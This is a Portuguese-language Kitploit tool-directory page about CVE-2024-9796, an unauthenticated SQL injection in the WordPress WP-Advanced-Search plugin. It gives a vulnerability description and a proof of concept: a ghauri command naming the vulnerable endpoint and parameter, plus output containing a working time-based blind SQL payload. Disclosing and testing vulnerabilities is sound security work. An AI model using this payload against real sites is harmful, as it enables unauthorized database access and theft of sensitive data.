Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-9796 — WordPress WP-Advanced-Search <= 3.3.9 - Injeção SQL não autenticada | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-9796
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoSegurança de Banco de Dados
GitHubrandomrobbiebf/cve-2024-9796

CVE-2024-9796

WordPress WP-Advanced-Search <= 3.3.9 - Injeção SQL não autenticada

Ver Repositório
4há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-9796

WordPress WP-Advanced-Search <= 3.3.9 - Injeção SQL não autenticada

Descrição

O plugin WP-Advanced-Search para WordPress é vulnerável a Injeção SQL em todas as versões até, e incluindo, 3.3.9 devido à insuficiência de escape no parâmetro fornecido pelo usuário e à falta de preparação adequada na consulta SQL existente. Isso possibilita que atacantes não autenticados anexem consultas SQL adicionais a consultas já existentes, que podem ser usadas para extrair informações sensíveis do banco de dados.

root@kitploit:~
Type: plugin
CVSS Score: 7.5
CVE: CVE-2024-9796
Slug: wp-advanced-search

Link de Download: Download wp-advanced-search Versão 3.3.9

#POC

root@kitploit:~
ghauri -u "https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899"
root@kitploit:~
Parameter: f (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (IF - comment)
    Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853'
Baixar ferramenta